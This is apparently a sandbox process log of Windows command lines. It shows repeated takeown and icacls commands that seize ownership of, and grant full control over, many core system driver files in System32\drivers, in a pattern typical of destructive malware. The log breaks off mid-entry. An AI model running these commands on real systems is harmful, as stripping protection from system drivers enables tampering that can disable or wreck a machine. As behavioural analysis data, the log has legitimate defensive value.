"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\crashdmp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\crcdisk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dfsc.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\csc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1779082986595619236-1173743541793682867336428395-236015858873508172146818294"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\discache.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\disk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Diskdump.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dmvsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\drmk.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\drmkaud.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Dumpata.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-20256454212124783835-15845944642134656928-2004920962332100758-1736108848-2129056469"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dumpfve.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "360670281-124206908299544432872436414386477189458706293-547436691-878836840"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxapi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxg.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxgkrnl.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1995010883650088518-1550160747652178777-1621429981457057748-1789085145770855404"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxgmms1.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\elxstor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "839754453-784914600168583633512756189032026843512-714848641539994237-826064940"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\errdev.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\evbda.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\exfat.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fastfat.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fdc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fileinfo.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\filetrace.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\flpydisk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fltMgr.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fsdepends.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fs_rec.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fvevol.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\gm.dls

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\gmreadme.txt

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hcw85cir.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hdaudbus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1664890165-19603650421516993266-11610778431111623472-184283297-9305714731509060386"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\HdAudio.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidbatt.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidbth.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidclass.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "998531034358343665-5640047066732965184408490113203509452126795731-1181779711"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidir.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidparse.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\HpSAMD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidusb.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\http.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hwpolicy.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\i8042prt.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\iaStorV.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\iirsp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\intelide.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ipfltdrv.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\intelppm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\IPMIDrv.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ipnat.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\irda.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\irenum.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "306179898-6838125208811112654497581241920601078930100306-995024081-458593078"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\isapnp.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ks.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\kbdclass.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "7577050671063502849-147567093112380484-613706989-13831206401447193382704600443"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksecpkg.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksecdd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\kbdhid.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksthunk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lltdio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_fc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_sas.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_sas2.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_scsi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\luafv.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\megasas.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mcd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MegaSR.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\modem.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

